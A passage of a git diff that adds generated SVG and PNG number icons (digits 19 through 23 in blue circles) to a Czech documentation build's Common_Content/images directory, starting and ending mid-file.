-0.265625,-1.361328 0,-0.415035 0.06087,-0.78857 0.182618,-1.120605 0.121744,-0.332027 0.287759,-0.630855 0.498046,-0.896485 0.210285,-0.265619 0.456542,-0.500808 0.73877,-0.705566 0.282224,-0.204747 0.583819,-0.384597 0.904785,-0.539551 -0.271161,-0.171543 -0.525718,-0.356927 -0.763672,-0.556152 -0.237957,-0.204746 -0.445477,-0.428866 -0.622558,-0.672363 -0.171551,-0.249016 -0.309897,-0.522942 -0.415039,-0.821778 -0.09961,-0.298819 -0.149415,-0.628083 -0.149414,-0.987793 -1e-6,-0.481435 0.09961,-0.902008 0.298828,-1.261718 0.204751,-0.365224 0.478676,-0.669585 0.821777,-0.913086 0.343097,-0.249012 0.738767,-0.434396 1.187012,-0.5561527 0.448238,-0.1217326 0.918615,-0.1826049 1.411133,-0.1826172 m -1.718262,9.0644529 c -3e-6,0.221357 0.03597,0.42611 0.10791,0.614258 0.07194,0.18262 0.17708,0.340334 0.31543,0.473145 0.143876,0.132814 0.32096,0.237957 0.53125,0.315429 0.210282,0.07194 0.453771,0.107912 0.730468,0.10791 0.58105,2e-6 1.015457,-0.135577 1.303223,-0.406738 0.287754,-0.27669 0.431634,-0.639157 0.431641,-1.087402 -7e-6,-0.232419 -0.04981,-0.439938 -0.149414,-0.622559 -0.09408,-0.188147 -0.218594,-0.359696 -0.373535,-0.514648 -0.14942,-0.160478 -0.32097,-0.307125 -0.514649,-0.439942 -0.19369,-0.132807 -0.387375,-0.260086 -0.581055,-0.381836 L 20.3878,16.72084 c -0.243494,0.12175 -0.464848,0.254563 -0.664062,0.398438 -0.199223,0.138351 -0.370772,0.293299 -0.514649,0.464844 -0.138349,0.16602 -0.246259,0.348637 -0.32373,0.547851 -0.07748,0.199223 -0.116214,0.415043 -0.116211,0.647461 m 1.70166,-7.188476 c -0.182622,10e-6 -0.354171,0.02768 -0.514648,0.08301 -0.154952,0.05535 -0.290532,0.13559 -0.406739,0.240723 -0.11068,0.105153 -0.199222,0.235199 -0.265625,0.390137 -0.06641,0.154957 -0.09961,0.329274 -0.09961,0.522949 -3e-6,0.232431 0.0332,0.434416 0.09961,0.605957 0.07194,0.166024 0.166012,0.315438 0.282227,0.448242 0.121741,0.127287 0.260087,0.243498 0.415039,0.348633 0.160477,0.09962 0.32926,0.199226 0.506348,0.298828 0.171544,-0.08853 0.334793,-0.185376 0.489746,-0.290527 0.154942,-0.105135 0.290522,-0.224113 0.406738,-0.356934 0.121739,-0.138338 0.218581,-0.293286 0.290527,-0.464843 0.07193,-0.171541 0.107904,-0.367993 0.10791,-0.589356 -6e-6,-0.193675 -0.03321,-0.367992 -0.09961,-0.522949 -0.06641,-0.154938 -0.15772,-0.284984 -0.273926,-0.390137 -0.116216,-0.105133 -0.254562,-0.185374 -0.415039,-0.240723 -0.160487,-0.05533 -0.334803,-0.083 -0.522949,-0.08301"
+       id="path2820"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/tmp/cs-CZ/html/Common_Content/images/19.png b/tmp/cs-CZ/html/Common_Content/images/19.png
new file mode 100644
index 000000000..bda9a8c55
Binary files /dev/null and b/tmp/cs-CZ/html/Common_Content/images/19.png differ
diff --git a/tmp/cs-CZ/html/Common_Content/images/19.svg b/tmp/cs-CZ/html/Common_Content/images/19.svg
new file mode 100644
index 000000000..385378074
--- /dev/null
+++ b/tmp/cs-CZ/html/Common_Content/images/19.svg
@@ -0,0 +1,31 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:center;text-anchor:middle;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 13.215925,22.008438 -2.564941,0 0,-7.022461 c -4e-6,-0.143873 -4e-6,-0.315422 0,-0.514648 0.0055,-0.204745 0.01106,-0.415031 0.0166,-0.63086 0.01106,-0.221345 0.01936,-0.442699 0.0249,-0.664062 0.01106,-0.221345 0.01936,-0.423331 0.0249,-0.605957 -0.02767,0.03321 -0.07471,0.08302 -0.141113,0.149414 -0.06641,0.06642 -0.141118,0.141122 -0.224121,0.224121 -0.08301,0.07748 -0.168787,0.157724 -0.257325,0.240723 -0.08854,0.08302 -0.1743194,0.157723 -0.2573238,0.224121 L 8.442976,14.529434 7.1978588,12.985489 11.107527,9.8726959 l 2.108398,0 0,12.1357421"
+       id="path2818"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+    <path
+       d="m 24.554792,15.052383 c -8e-6,0.581061 -0.03321,1.162116 -0.09961,1.743164 -0.06088,0.575526 -0.174325,1.126144 -0.340332,1.651856 -0.16049,0.525719 -0.381844,1.018232 -0.664063,1.477539 -0.2767,0.453778 -0.630866,0.846681 -1.0625,1.178711 -0.426112,0.332032 -0.94076,0.59489 -1.543945,0.788574 -0.597661,0.188151 -1.300459,0.282227 -2.108398,0.282227 -0.116214,0 -0.243493,-0.0028 -0.381836,-0.0083 -0.138349,-0.0055 -0.279462,-0.01384 -0.42334,-0.0249 -0.138348,-0.0055 -0.273928,-0.0166 -0.406738,-0.0332 -0.132814,-0.01107 -0.249025,-0.02767 -0.348633,-0.0498 l 0,-2.058594 c 0.204751,0.05534 0.423338,0.09961 0.655762,0.132813 0.237953,0.02767 0.478675,0.04151 0.722168,0.0415 0.747066,2e-6 1.361324,-0.09131 1.842773,-0.273925 0.48144,-0.188149 0.863276,-0.44824 1.145508,-0.780274 0.28222,-0.337562 0.481439,-0.738766 0.597656,-1.203613 0.121738,-0.464839 0.196445,-0.97672 0.224121,-1.535645 l -0.10791,0 c -0.110683,0.199225 -0.243496,0.384609 -0.398438,0.556153 -0.154953,0.171554 -0.33757,0.320968 -0.547851,0.448242 -0.210292,0.127283 -0.448247,0.226892 -0.713867,0.298828 -0.26563,0.07194 -0.561691,0.107914 -0.888184,0.10791 -0.525719,4e-6 -0.998863,-0.08577 -1.419433,-0.257324 -0.420575,-0.171545 -0.777509,-0.420568 -1.070801,-0.74707 -0.287762,-0.326492 -0.509116,-0.727696 -0.664063,-1.203614 -0.154948,-0.475904 -0.232422,-1.020988 -0.232422,-1.635253 0,-0.65852 0.09131,-1.247875 0.273926,-1.768067 0.18815,-0.520172 0.453775,-0.960113 0.796875,-1.319824 0.343097,-0.365223 0.758136,-0.644682 1.245117,-0.838379 0.49251,-0.1936727 1.043128,-0.2905151 1.651856,-0.2905274 0.597651,1.23e-5 1.15657,0.1079224 1.676758,0.3237304 0.520175,0.210298 0.971184,0.534028 1.353027,0.971192 0.381828,0.437185 0.683423,0.990569 0.904785,1.660156 0.221346,0.669605 0.332023,1.458178 0.332031,2.365722 m -4.216796,-3.262207 c -0.226893,1.1e-5 -0.434412,0.04151 -0.622559,0.124512 -0.188155,0.08302 -0.351403,0.213063 -0.489746,0.390137 -0.132816,0.171559 -0.237959,0.392913 -0.31543,0.664062 -0.07194,0.265634 -0.107913,0.581063 -0.10791,0.946289 -3e-6,0.586596 0.124509,1.05144 0.373535,1.394532 0.24902,0.343105 0.625322,0.514654 1.128906,0.514648 0.254553,6e-6 0.486975,-0.0498 0.697266,-0.149414 0.210281,-0.0996 0.390131,-0.229648 0.539551,-0.390137 0.149408,-0.160475 0.262852,-0.340325 0.340332,-0.53955 0.083,-0.199212 0.124505,-0.401197 0.124512,-0.605958 -7e-6,-0.282218 -0.03598,-0.561677 -0.107911,-0.838378 -0.06641,-0.282218 -0.171555,-0.534008 -0.315429,-0.755372 -0.138352,-0.226878 -0.312669,-0.409495 -0.52295,-0.547851 -0.204757,-0.138336 -0.44548,-0.207509 -0.722167,-0.20752"
+       id="path2820"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/tmp/cs-CZ/html/Common_Content/images/2.png b/tmp/cs-CZ/html/Common_Content/images/2.png
new file mode 100644
index 000000000..b95445a4e
Binary files /dev/null and b/tmp/cs-CZ/html/Common_Content/images/2.png differ
diff --git a/tmp/cs-CZ/html/Common_Content/images/2.svg b/tmp/cs-CZ/html/Common_Content/images/2.svg
new file mode 100644
index 000000000..236a8dacb
--- /dev/null
+++ b/tmp/cs-CZ/html/Common_Content/images/2.svg
@@ -0,0 +1,27 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 19.89546,22.008438 -8.143066,0 0,-1.784668 2.855468,-3.07959 c 0.359697,-0.387364 0.686194,-0.744297 0.979493,-1.0708 0.293289,-0.326492 0.545079,-0.644688 0.755371,-0.95459 0.210281,-0.309889 0.373529,-0.625318 0.489746,-0.946289 0.116205,-0.320956 0.17431,-0.666821 0.174316,-1.037598 -6e-6,-0.409496 -0.124517,-0.727692 -0.373535,-0.95459 -0.243495,-0.226878 -0.572759,-0.340322 -0.987793,-0.340332 -0.437178,10e-6 -0.857751,0.10792 -1.261719,0.323731 -0.403974,0.215829 -0.827313,0.522958 -1.270019,0.921386 l -1.394531,-1.651855 c 0.249022,-0.226877 0.509113,-0.442698 0.780273,-0.647461 0.271157,-0.210275 0.569985,-0.395659 0.896484,-0.556152 0.326495,-0.16047 0.686195,-0.2877488 1.079102,-0.3818364 0.3929,-0.099597 0.832841,-0.1494018 1.319824,-0.1494141 0.58105,1.23e-5 1.101231,0.080253 1.560547,0.2407227 0.464837,0.1604938 0.860507,0.3901488 1.187012,0.6889648 0.326489,0.293305 0.575513,0.650239 0.74707,1.070801 0.177075,0.420583 0.265617,0.893727 0.265625,1.419433 -8e-6,0.47592 -0.08302,0.932463 -0.249023,1.369629 -0.166024,0.431648 -0.392912,0.857754 -0.680664,1.278321 -0.287768,0.415044 -0.622566,0.830083 -1.004395,1.245117 -0.376308,0.40951 -0.780279,0.827315 -1.211914,1.253418 l -1.460937,1.469238 0,0.116211 4.947265,0 0,2.158203"
+       id="path2818"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/tmp/cs-CZ/html/Common_Content/images/20.png b/tmp/cs-CZ/html/Common_Content/images/20.png
new file mode 100644
index 000000000..c30191a36
Binary files /dev/null and b/tmp/cs-CZ/html/Common_Content/images/20.png differ
diff --git a/tmp/cs-CZ/html/Common_Content/images/20.svg b/tmp/cs-CZ/html/Common_Content/images/20.svg
new file mode 100644
index 000000000..d41206eec
--- /dev/null
+++ b/tmp/cs-CZ/html/Common_Content/images/20.svg
@@ -0,0 +1,31 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:center;text-anchor:middle;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 15.257917,22.008438 -8.143066,0 0,-1.784668 2.8554687,-3.07959 c 0.3596963,-0.387364 0.6861933,-0.744297 0.9794923,-1.0708 0.293289,-0.326492 0.54508,-0.644688 0.755371,-0.95459 0.210281,-0.309889 0.37353,-0.625318 0.489746,-0.946289 0.116205,-0.320956 0.174311,-0.666821 0.174317,-1.037598 -6e-6,-0.409496 -0.124518,-0.727692 -0.373536,-0.95459 -0.243495,-0.226878 -0.572759,-0.340322 -0.987793,-0.340332 -0.437178,10e-6 -0.857751,0.10792 -1.2617183,0.323731 C 9.3422244,12.379541 8.918885,12.68667 8.4761791,13.085098 L 7.0816479,11.433243 C 7.3306704,11.206366 7.5907613,10.990545 7.8619213,10.785782 8.1330785,10.575507 8.4319063,10.390123 8.7584057,10.22963 9.0849004,10.06916 9.4446006,9.9418812 9.8375072,9.8477936 10.230407,9.7481965 10.670348,9.6983918 11.157331,9.6983795 c 0.58105,1.23e-5 1.101232,0.080253 1.560547,0.2407227 0.464837,0.1604938 0.860508,0.3901488 1.187012,0.6889648 0.32649,0.293305 0.575513,0.650239 0.74707,1.070801 0.177075,0.420583 0.265617,0.893727 0.265625,1.419433 -8e-6,0.47592 -0.08302,0.932463 -0.249023,1.369629 -0.166024,0.431648 -0.392912,0.857754 -0.680664,1.278321 -0.287768,0.415044 -0.622566,0.830083 -1.004395,1.245117 -0.376308,0.40951 -0.780279,0.827315 -1.211914,1.253418 l -1.460937,1.469238 0,0.116211 4.947265,0 0,2.158203"
+       id="path2818"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+    <path
+       d="m 24.6378,15.940567 c -9e-6,0.979497 -0.07748,1.853845 -0.232422,2.623047 -0.149422,0.769208 -0.392912,1.422202 -0.730468,1.958984 -0.332039,0.536785 -0.763679,0.94629 -1.294922,1.228516 -0.525722,0.282226 -1.162115,0.42334 -1.90918,0.42334 -0.702803,0 -1.314294,-0.141114 -1.834473,-0.42334 -0.520184,-0.282226 -0.951824,-0.691731 -1.294922,-1.228516 -0.3431,-0.536782 -0.600424,-1.189776 -0.771972,-1.958984 -0.166016,-0.769202 -0.249024,-1.64355 -0.249024,-2.623047 0,-0.979485 0.07471,-1.8566 0.224121,-2.631348 0.154948,-0.77473 0.398437,-1.430491 0.730469,-1.967285 0.33203,-0.536772 0.760903,-0.946277 1.286621,-1.228515 0.525713,-0.2877487 1.162106,-0.4316287 1.90918,-0.431641 0.69726,1.23e-5 1.305984,0.1411254 1.826172,0.42334 0.520175,0.282238 0.954582,0.691743 1.303223,1.228515 0.348624,0.536794 0.608715,1.192555 0.780273,1.967286 0.171541,0.774747 0.257315,1.654629 0.257324,2.639648 m -5.760742,0 c -3e-6,1.383468 0.118975,2.423832 0.356934,3.121094 0.237952,0.697268 0.650223,1.0459 1.236816,1.045898 0.575516,2e-6 0.987787,-0.345863 1.236816,-1.037597 0.254552,-0.691729 0.38183,-1.734859 0.381836,-3.129395 -6e-6,-1.38899 -0.127284,-2.43212 -0.381836,-3.129395 -0.249029,-0.702789 -0.6613,-1.054188 -1.236816,-1.054199 -0.293299,1.1e-5 -0.542322,0.08855 -0.74707,0.265625 -0.199223,0.177093 -0.362471,0.439951 -0.489746,0.788574 -0.127282,0.348642 -0.218591,0.785816 -0.273926,1.311524 -0.05534,0.52019 -0.08301,1.126146 -0.08301,1.817871"
+       id="path2820"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/tmp/cs-CZ/html/Common_Content/images/21.png b/tmp/cs-CZ/html/Common_Content/images/21.png
new file mode 100644
index 000000000..fa3aa907d
Binary files /dev/null and b/tmp/cs-CZ/html/Common_Content/images/21.png differ
diff --git a/tmp/cs-CZ/html/Common_Content/images/21.svg b/tmp/cs-CZ/html/Common_Content/images/21.svg
new file mode 100644
index 000000000..b17f23a5a
--- /dev/null
+++ b/tmp/cs-CZ/html/Common_Content/images/21.svg
@@ -0,0 +1,31 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:center;text-anchor:middle;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 15.257917,22.008438 -8.143066,0 0,-1.784668 2.8554687,-3.07959 c 0.3596963,-0.387364 0.6861933,-0.744297 0.9794923,-1.0708 0.293289,-0.326492 0.54508,-0.644688 0.755371,-0.95459 0.210281,-0.309889 0.37353,-0.625318 0.489746,-0.946289 0.116205,-0.320956 0.174311,-0.666821 0.174317,-1.037598 -6e-6,-0.409496 -0.124518,-0.727692 -0.373536,-0.95459 -0.243495,-0.226878 -0.572759,-0.340322 -0.987793,-0.340332 -0.437178,10e-6 -0.857751,0.10792 -1.2617183,0.323731 C 9.3422244,12.379541 8.918885,12.68667 8.4761791,13.085098 L 7.0816479,11.433243 C 7.3306704,11.206366 7.5907613,10.990545 7.8619213,10.785782 8.1330785,10.575507 8.4319063,10.390123 8.7584057,10.22963 9.0849004,10.06916 9.4446006,9.9418812 9.8375072,9.8477936 10.230407,9.7481965 10.670348,9.6983918 11.157331,9.6983795 c 0.58105,1.23e-5 1.101232,0.080253 1.560547,0.2407227 0.464837,0.1604938 0.860508,0.3901488 1.187012,0.6889648 0.32649,0.293305 0.575513,0.650239 0.74707,1.070801 0.177075,0.420583 0.265617,0.893727 0.265625,1.419433 -8e-6,0.47592 -0.08302,0.932463 -0.249023,1.369629 -0.166024,0.431648 -0.392912,0.857754 -0.680664,1.278321 -0.287768,0.415044 -0.622566,0.830083 -1.004395,1.245117 -0.376308,0.40951 -0.780279,0.827315 -1.211914,1.253418 l -1.460937,1.469238 0,0.116211 4.947265,0 0,2.158203"
+       id="path2818"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+    <path
+       d="m 22.579206,22.008438 -2.564941,0 0,-7.022461 c -4e-6,-0.143873 -4e-6,-0.315422 0,-0.514648 0.0055,-0.204745 0.01106,-0.415031 0.0166,-0.63086 0.01106,-0.221345 0.01936,-0.442699 0.0249,-0.664062 0.01106,-0.221345 0.01936,-0.423331 0.0249,-0.605957 -0.02767,0.03321 -0.07471,0.08302 -0.141113,0.149414 -0.06641,0.06642 -0.141117,0.141122 -0.224121,0.224121 -0.08301,0.07748 -0.168786,0.157724 -0.257324,0.240723 -0.08855,0.08302 -0.17432,0.157723 -0.257325,0.224121 l -1.394531,1.120605 -1.245117,-1.543945 3.909668,-3.1127931 2.108398,0 0,12.1357421"
+       id="path2820"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/tmp/cs-CZ/html/Common_Content/images/22.png b/tmp/cs-CZ/html/Common_Content/images/22.png
new file mode 100644
index 000000000..b724ced13
Binary files /dev/null and b/tmp/cs-CZ/html/Common_Content/images/22.png differ
diff --git a/tmp/cs-CZ/html/Common_Content/images/22.svg b/tmp/cs-CZ/html/Common_Content/images/22.svg
new file mode 100644
index 000000000..22deeb3ed
--- /dev/null
+++ b/tmp/cs-CZ/html/Common_Content/images/22.svg
@@ -0,0 +1,31 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:center;text-anchor:middle;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 15.257917,22.008438 -8.143066,0 0,-1.784668 2.8554687,-3.07959 c 0.3596963,-0.387364 0.6861933,-0.744297 0.9794923,-1.0708 0.293289,-0.326492 0.54508,-0.644688 0.755371,-0.95459 0.210281,-0.309889 0.37353,-0.625318 0.489746,-0.946289 0.116205,-0.320956 0.174311,-0.666821 0.174317,-1.037598 -6e-6,-0.409496 -0.124518,-0.727692 -0.373536,-0.95459 -0.243495,-0.226878 -0.572759,-0.340322 -0.987793,-0.340332 -0.437178,10e-6 -0.857751,0.10792 -1.2617183,0.323731 C 9.3422244,12.379541 8.918885,12.68667 8.4761791,13.085098 L 7.0816479,11.433243 C 7.3306704,11.206366 7.5907613,10.990545 7.8619213,10.785782 8.1330785,10.575507 8.4319063,10.390123 8.7584057,10.22963 9.0849004,10.06916 9.4446006,9.9418812 9.8375072,9.8477936 10.230407,9.7481965 10.670348,9.6983918 11.157331,9.6983795 c 0.58105,1.23e-5 1.101232,0.080253 1.560547,0.2407227 0.464837,0.1604938 0.860508,0.3901488 1.187012,0.6889648 0.32649,0.293305 0.575513,0.650239 0.74707,1.070801 0.177075,0.420583 0.265617,0.893727 0.265625,1.419433 -8e-6,0.47592 -0.08302,0.932463 -0.249023,1.369629 -0.166024,0.431648 -0.392912,0.857754 -0.680664,1.278321 -0.287768,0.415044 -0.622566,0.830083 -1.004395,1.245117 -0.376308,0.40951 -0.780279,0.827315 -1.211914,1.253418 l -1.460937,1.469238 0,0.116211 4.947265,0 0,2.158203"
+       id="path2818"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+    <path
+       d="m 24.621199,22.008438 -8.143067,0 0,-1.784668 2.855469,-3.07959 c 0.359697,-0.387364 0.686194,-0.744297 0.979492,-1.0708 0.29329,-0.326492 0.54508,-0.644688 0.755371,-0.95459 0.210281,-0.309889 0.37353,-0.625318 0.489746,-0.946289 0.116205,-0.320956 0.174311,-0.666821 0.174317,-1.037598 -6e-6,-0.409496 -0.124518,-0.727692 -0.373535,-0.95459 -0.243495,-0.226878 -0.572759,-0.340322 -0.987793,-0.340332 -0.437179,10e-6 -0.857751,0.10792 -1.261719,0.323731 -0.403974,0.215829 -0.827314,0.522958 -1.27002,0.921386 l -1.394531,-1.651855 c 0.249023,-0.226877 0.509114,-0.442698 0.780274,-0.647461 0.271157,-0.210275 0.569985,-0.395659 0.896484,-0.556152 0.326495,-0.16047 0.686195,-0.2877488 1.079101,-0.3818364 0.3929,-0.099597 0.832841,-0.1494018 1.319825,-0.1494141 0.581049,1.23e-5 1.101231,0.080253 1.560547,0.2407227 0.464837,0.1604938 0.860507,0.3901488 1.187011,0.6889648 0.32649,0.293305 0.575513,0.650239 0.747071,1.070801 0.177075,0.420583 0.265616,0.893727 0.265625,1.419433 -9e-6,0.47592 -0.08302,0.932463 -0.249024,1.369629 -0.166024,0.431648 -0.392911,0.857754 -0.680664,1.278321 -0.287768,0.415044 -0.622565,0.830083 -1.004394,1.245117 -0.376309,0.40951 -0.78028,0.827315 -1.211914,1.253418 l -1.460938,1.469238 0,0.116211 4.947266,0 0,2.158203"
+       id="path2820"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/tmp/cs-CZ/html/Common_Content/images/23.png b/tmp/cs-CZ/html/Common_Content/images/23.png
new file mode 100644
index 000000000..8b69b8292
Binary files /dev/null and b/tmp/cs-CZ/html/Common_Content/images/23.png differ
diff --git a/tmp/cs-CZ/html/Common_Content/images/23.svg b/tmp/cs-CZ/html/Common_Content/images/23.svg
new file mode 100644
index 000000000..c0a33eeb0
--- /dev/null
+++ b/tmp/cs-CZ/html/Common_Content/images/23.svg
@@ -0,0 +1,31 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:center;text-anchor:middle;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 15.257917,22.008438 -8.143066,0 0,-1.784668 2.8554687,-3.07959 c 0.3596963,-0.387364 0.6861933,-0.744297 0.9794923,-1.0708 0.293289,-0.326492 0.54508,-0.644688 0.755371,-0.95459 0.210281,-0.309889 0.37353,-0.625318 0.489746,-0.946289 0.116205,-0.320956 0.174311,-0.666821 0.174317,-1.037598 -6e-6,-0.409496 -0.124518,-0.727692 -0.373536,-0.95459 -0.243495,-0.226878 -0.572759,-0.340322 -0.987793,-0.340332 -0.437178,10e-6 -0.857751,0.10792 -1.2617183,0.323731 C 9.3422244,12.379541 8.918885,12.68667 8.4761791,13.085098 L 7.0816479,11.433243 C 7.3306704,11.206366 7.5907613,10.990545 7.8619213,10.785782 8.1330785,10.575507 8.4319063,10.390123 8.7584057,10.22963 9.0849004,10.06916 9.4446006,9.9418812 9.8375072,9.8477936 10.230407,9.7481965 10.670348,9.6983918 11.157331,9.6983795 c 0.58105,1.23e-5 1.101232,0.080253 1.560547,0.2407227 0.464837,0.1604938 0.860508,0.3901488 1.187012,0.6889648 0.32649,0.293305 0.575513,0.650239 0.74707,1.070801 0.177075,0.420583 0.265617,0.893727 0.265625,1.419433 -8e-6,0.47592 -0.08302,0.932463 -0.249023,1.369629 -0.166024,0.431648 -0.392912,0.857754 -0.680664,1.278321 -0.287768,0.415044 -0.622566,0.830083 -1.004395,1.245117 -0.376308,0.40951 -0.780279,0.827315 -1.211914,1.253418 l -1.460937,1.469238 0,0.116211 4.947265,0 0,2.158203"
+       id="path2818"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+    <path
+       d="m 24.148054,12.587051 c -8e-6,0.420582 -0.06918,0.799651 -0.207519,1.137207 -0.132821,0.33204 -0.318205,0.625334 -0.556153,0.879883 -0.232429,0.249031 -0.509121,0.459317 -0.830078,0.63086 -0.315436,0.166022 -0.658535,0.2933 -1.029297,0.381836 l 0,0.0498 c 0.979486,0.121751 1.721021,0.420579 2.22461,0.896485 0.503572,0.470382 0.755362,1.106775 0.755371,1.909179 -9e-6,0.531253 -0.09685,1.023766 -0.290528,1.477539 -0.188159,0.448244 -0.481453,0.83838 -0.879882,1.170411 -0.392911,0.332031 -0.890958,0.592122 -1.494141,0.780273 -0.597662,0.182617 -1.303227,0.273926 -2.116699,0.273926 -0.652998,0 -1.267256,-0.05534 -1.842774,-0.166016 -0.575522,-0.105143 -1.112305,-0.268392 -1.610351,-0.489746 l 0,-2.183105 c 0.249022,0.132815 0.51188,0.249025 0.788574,0.348632 0.276691,0.09961 0.553384,0.185387 0.830078,0.257325 0.27669,0.06641 0.547849,0.116212 0.813477,0.149414 0.271155,0.0332 0.525712,0.04981 0.763671,0.0498 0.475908,2e-6 0.871578,-0.04427 1.187012,-0.132812 0.315425,-0.08854 0.567215,-0.213051 0.755371,-0.373535 0.188146,-0.16048 0.320958,-0.351397 0.398438,-0.572754 0.083,-0.226885 0.124505,-0.473141 0.124512,-0.73877 -7e-6,-0.249019 -0.05258,-0.47314 -0.157715,-0.672363 -0.09962,-0.20474 -0.265631,-0.376289 -0.498047,-0.51464 -0.226893,-0.143876 -0.525721,-0.254553 -0.896485,-0.332032 -0.370772,-0.07747 -0.827315,-0.116205 -1.369628,-0.116211 l -0.863282,0 0,-1.801269 0.84668,0 c 0.509111,7e-6 0.93245,-0.04426 1.270019,-0.132813 0.337561,-0.09407 0.605952,-0.218579 0.805176,-0.373535 0.204747,-0.160474 0.348627,-0.345858 0.431641,-0.556152 0.083,-0.210278 0.124506,-0.434399 0.124512,-0.672363 -6e-6,-0.431632 -0.135585,-0.769197 -0.406739,-1.012696 -0.26563,-0.243479 -0.688969,-0.365224 -1.270019,-0.365234 -0.265629,1e-5 -0.514652,0.02768 -0.747071,0.08301 -0.226891,0.04981 -0.439944,0.116221 -0.63916,0.199218 -0.193687,0.07748 -0.373537,0.166026 -0.53955,0.265625 -0.160484,0.09409 -0.307131,0.188161 -0.439942,0.282227 l -1.294922,-1.709961 c 0.232421,-0.171538 0.484212,-0.329253 0.755371,-0.473145 0.276692,-0.143868 0.575519,-0.26838 0.896485,-0.373535 0.320961,-0.1106647 0.666826,-0.1964393 1.037597,-0.2573239 0.370765,-0.06086 0.766435,-0.091296 1.187012,-0.091309 0.597651,1.23e-5 1.139969,0.066419 1.626953,0.1992188 0.492507,0.1272911 0.913079,0.3154421 1.261719,0.5644531 0.348625,0.243501 0.617017,0.545096 0.805176,0.904786 